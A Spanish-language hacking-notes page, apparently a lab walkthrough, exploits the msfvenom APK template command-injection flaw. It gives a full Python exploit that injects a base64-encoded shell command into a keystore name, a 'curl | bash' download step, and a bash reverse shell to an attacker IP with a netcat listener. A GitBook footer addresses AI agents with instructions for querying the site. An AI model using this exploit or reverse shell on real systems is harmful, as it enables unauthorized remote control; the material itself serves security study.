> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/cms/msfvenom-apk-exploitation.md).

# APK con Msfvenom

## Inyección de comandos en plantilla APK de msfvenom

<figure><img src="/files/427a6edcde3d9fb3f8e940deb5f21cfe13c13e71" alt=""><figcaption></figcaption></figure>

Se identifica un servicio vulnerable en el puerto 5000.

<figure><img src="/files/203d820489eaee8012126e16e007bf2ad27e65c1" alt=""><figcaption></figcaption></figure>

Busca vulnerabilidades relacionadas:

```bash
searchsploit -m multiple/local/49491.py
```

Se identifica una posible inyección basada en APK.

<figure><img src="/files/f646987cfb1a5e29ddfdb30fa5e39867dafaf1d2" alt="" width="557"><figcaption></figcaption></figure>

**Script de exploit (msfvenom-exploit.py)**

```bash
python3 msfvenom-exploit.py
```

```python
#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Cámbiame
payload = 'ping 10.10.14.50'

# b64encode para evitar badchars (keytool es quisquilloso)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | /bin/bash #"

print(f"[+] Fabricando un apkfile malicioso")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Crear empty_file
open(empty_file, "w").close()

# Crear apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])
# Generar clave de firma con -dname malicioso
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Firmar el APK usando nuestro dname malicioso
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] ¡Hecho! apkfile está en {apk_file}")
print(f"Haz: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
```

El script genera un archivo temporal que contiene un APK malicioso.

<figure><img src="/files/6f38a9d8de5eff91126f15b18fae8fc586e52c49" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/073c92cb2b3b72353cbea42c4fcfbbdd980abc53" alt=""><figcaption></figcaption></figure>

**Análisis de paquetes ICMP**

Monitorea la actividad de red en busca de una devolución de llamada:

```bash
tcpdump -i tun0 icmp -n
```

<figure><img src="/files/44aa07bcd7bd7fcdd673635c0e788fd09060b4c7" alt=""><figcaption></figcaption></figure>

### **Explotación RCE con Msfvenom**

Modifica el payload para establecer una conexión inversa:

```bash
# Cámbiame
payload = 'curl 10.10.14.50 | bash'
```

Crear un `index.html` archivo que contiene:

```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.50/443 0>&1
```

Inicia un servidor HTTP:

```bash
python3 -m http.server 80
```

Luego escucha la conexión en el puerto 443:

```bash
nc -nlvp 443
```

Una vez que el APK se envía y se ejecuta en el objetivo, se obtiene una shell remota.

<figure><img src="/files/d8a637c3963302349052ce55cf4f94b79ad676fe" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/cms/msfvenom-apk-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
